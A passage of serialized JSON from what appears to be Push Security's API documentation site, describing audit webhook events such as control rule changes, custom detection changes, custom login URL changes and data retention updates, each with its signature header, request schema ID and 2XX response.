removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/control-rule-removed-event","routeSlug":"/webhooks-v1/audit/control-rule-removed-event","metadata":{"seo":{"title":"Control rule removed","description":"An admin user has removed a control rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"control-rule-removed-event","name":"Control rule removed","isWebhook":true,"pointer":"/paths/control-rule-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Control rule removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has removed a control rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/control-rule-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_656"}},"schemaId":"schema_656","pointer":"/paths/control-rule-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"control-rule-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_656"}},"responseCodes":["2XX"],"pointer":"control-rule-removed","href":"audit/control-rule-removed-event","openApiOperationId":"control-rule-removed-event","summary":"Control rule removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_656","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_656"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/control-rule-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/control-rule-removed-event"}],"panels":[]}]},"httpPath":"control-rule-removed"},{"label":"Control rule toggled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/control-rule-toggled-event","routeSlug":"/webhooks-v1/audit/control-rule-toggled-event","metadata":{"seo":{"title":"Control rule toggled","description":"An admin user has enabled or disabled a control rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"control-rule-toggled-event","name":"Control rule toggled","isWebhook":true,"pointer":"/paths/control-rule-toggled/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Control rule toggled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has enabled or disabled a control rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/control-rule-toggled/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_657"}},"schemaId":"schema_657","pointer":"/paths/control-rule-toggled/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"control-rule-toggled","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_657"}},"responseCodes":["2XX"],"pointer":"control-rule-toggled","href":"audit/control-rule-toggled-event","openApiOperationId":"control-rule-toggled-event","summary":"Control rule toggled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_657","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_657"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/control-rule-toggled/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/control-rule-toggled-event"}],"panels":[]}]},"httpPath":"control-rule-toggled"},{"label":"Control rule reordered","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/control-rule-reordered-event","routeSlug":"/webhooks-v1/audit/control-rule-reordered-event","metadata":{"seo":{"title":"Control rule reordered","description":"An admin user has reordered a new control rule."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"control-rule-reordered-event","name":"Control rule reordered","isWebhook":true,"pointer":"/paths/control-rule-reordered/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Control rule reordered","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has reordered a new control rule."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/control-rule-reordered/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_658"}},"schemaId":"schema_658","pointer":"/paths/control-rule-reordered/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"control-rule-reordered","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_658"}},"responseCodes":["2XX"],"pointer":"control-rule-reordered","href":"audit/control-rule-reordered-event","openApiOperationId":"control-rule-reordered-event","summary":"Control rule reordered"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_658","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_658"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/control-rule-reordered/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/control-rule-reordered-event"}],"panels":[]}]},"httpPath":"control-rule-reordered"},{"label":"Custom detection created","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/custom-detection-created-event","routeSlug":"/webhooks-v1/audit/custom-detection-created-event","metadata":{"seo":{"title":"Custom detection created","description":"An admin user has created a new custom detection."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"custom-detection-created-event","name":"Custom detection created","isWebhook":true,"pointer":"/paths/custom-detection-created/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Custom detection created","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has created a new custom detection."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/custom-detection-created/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_659"}},"schemaId":"schema_659","pointer":"/paths/custom-detection-created/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"custom-detection-created","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_659"}},"responseCodes":["2XX"],"pointer":"custom-detection-created","href":"audit/custom-detection-created-event","openApiOperationId":"custom-detection-created-event","summary":"Custom detection created"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_659","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_659"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/custom-detection-created/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/custom-detection-created-event"}],"panels":[]}]},"httpPath":"custom-detection-created"},{"label":"Custom detection removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/custom-detection-removed-event","routeSlug":"/webhooks-v1/audit/custom-detection-removed-event","metadata":{"seo":{"title":"Custom detection removed","description":"An admin user has removed a custom detection."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"custom-detection-removed-event","name":"Custom detection removed","isWebhook":true,"pointer":"/paths/custom-detection-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Custom detection removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has removed a custom detection."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/custom-detection-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_660"}},"schemaId":"schema_660","pointer":"/paths/custom-detection-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"custom-detection-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_660"}},"responseCodes":["2XX"],"pointer":"custom-detection-removed","href":"audit/custom-detection-removed-event","openApiOperationId":"custom-detection-removed-event","summary":"Custom detection removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_660","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_660"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/custom-detection-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/custom-detection-removed-event"}],"panels":[]}]},"httpPath":"custom-detection-removed"},{"label":"Custom detection configuration updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/custom-detection-updated-event","routeSlug":"/webhooks-v1/audit/custom-detection-updated-event","metadata":{"seo":{"title":"Custom detection configuration updated","description":"An admin user has updated the configuration of a custom detection."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"custom-detection-updated-event","name":"Custom detection configuration updated","isWebhook":true,"pointer":"/paths/custom-detection-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Custom detection configuration updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user has updated the configuration of a custom detection."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/custom-detection-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_661"}},"schemaId":"schema_661","pointer":"/paths/custom-detection-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"custom-detection-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_661"}},"responseCodes":["2XX"],"pointer":"custom-detection-updated","href":"audit/custom-detection-updated-event","openApiOperationId":"custom-detection-updated-event","summary":"Custom detection configuration updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_661","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_661"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/custom-detection-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/custom-detection-updated-event"}],"panels":[]}]},"httpPath":"custom-detection-updated"},{"label":"Custom login URL added","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/custom-login-url-added-event","routeSlug":"/webhooks-v1/audit/custom-login-url-added-event","metadata":{"seo":{"title":"Custom login URL added","description":"A custom login URL has been added for an app."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"custom-login-url-added-event","name":"Custom login URL added","isWebhook":true,"pointer":"/paths/custom-login-url-added/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Custom login URL added","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A custom login URL has been added for an app."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/custom-login-url-added/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_662"}},"schemaId":"schema_662","pointer":"/paths/custom-login-url-added/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"custom-login-url-added","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_662"}},"responseCodes":["2XX"],"pointer":"custom-login-url-added","href":"audit/custom-login-url-added-event","openApiOperationId":"custom-login-url-added-event","summary":"Custom login URL added"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_662","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_662"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/custom-login-url-added/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/custom-login-url-added-event"}],"panels":[]}]},"httpPath":"custom-login-url-added"},{"label":"Custom login URL removed","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/custom-login-url-removed-event","routeSlug":"/webhooks-v1/audit/custom-login-url-removed-event","metadata":{"seo":{"title":"Custom login URL removed","description":"A custom login URL has been removed for an app."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"custom-login-url-removed-event","name":"Custom login URL removed","isWebhook":true,"pointer":"/paths/custom-login-url-removed/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Custom login URL removed","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"A custom login URL has been removed for an app."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/custom-login-url-removed/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_663"}},"schemaId":"schema_663","pointer":"/paths/custom-login-url-removed/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"custom-login-url-removed","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_663"}},"responseCodes":["2XX"],"pointer":"custom-login-url-removed","href":"audit/custom-login-url-removed-event","openApiOperationId":"custom-login-url-removed-event","summary":"Custom login URL removed"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_663","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_663"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/custom-login-url-removed/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/custom-login-url-removed-event"}],"panels":[]}]},"httpPath":"custom-login-url-removed"},{"label":"Data retention configuration updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/data-retention-configuration-updated-event","routeSlug":"/webhooks-v1/audit/data-retention-configuration-updated-event","metadata":{"seo":{"title":"Data retention configuration updated","description":"An admin user updated the data retention configuration."}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"data-retention-configuration-updated-event","name":"Data retention configuration updated","isWebhook":true,"pointer":"/paths/data-retention-configuration-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Data retention configuration updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"An admin user updated the data retention configuration."},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/data-retention-configuration-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_664"}},"schemaId":"schema_664","pointer":"/paths/data-retention-configuration-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"data-retention-configuration-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_664"}},"responseCodes":["2XX"],"pointer":"data-retention-configuration-updated","href":"audit/data-retention-configuration-updated-event","openApiOperationId":"data-retention-configuration-updated-event","summary":"Data retention configuration updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_664","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_664"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/data-retention-configuration-updated/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/data-retention-configuration-updated-event"}],"panels":[]}]},"httpPath":"data-retention-configuration-updated"},{"label":"Detection archive status updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/detection-archive-status-updated-event","routeSlug":"/webhooks-v1/audit/detection-archive-status-updated-event","metadata":{"seo":{"title":"Detection archive status updated","description":"The archive status of a detection has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"detection-archive-status-updated-event","name":"Detection archive status updated","isWebhook":true,"pointer":"/paths/detection-archived/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Detection archive status updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The archive status of a detection has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/detection-archived/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_665"}},"schemaId":"schema_665","pointer":"/paths/detection-archived/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"detection-archived","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_665"}},"responseCodes":["2XX"],"pointer":"detection-archived","href":"audit/detection-archive-status-updated-event","openApiOperationId":"detection-archive-status-updated-event","summary":"Detection archive status updated"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_665","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_665"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/detection-archived/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/audit/detection-archive-status-updated-event"}],"panels":[]}]},"httpPath":"detection-archived"},{"label":"Detection classification updated","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/audit/detection-classification-updated-event","routeSlug":"/webhooks-v1/audit/detection-classification-updated-event","metadata":{"seo":{"title":"Detection classification updated","description":"The classification of a detection has been updated"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"detection-classification-updated-event","name":"Detection classification updated","isWebhook":true,"pointer":"/paths/detection-classification-updated/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Detection classification updated","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"markdoc","content":"The classification of a detection has been updated"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/detection-classification-updated/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_666"}},"schemaId":"schema_666","pointer":"/paths/detection-classification-updated/post/requestBody"}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"detection-classification-updated","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: 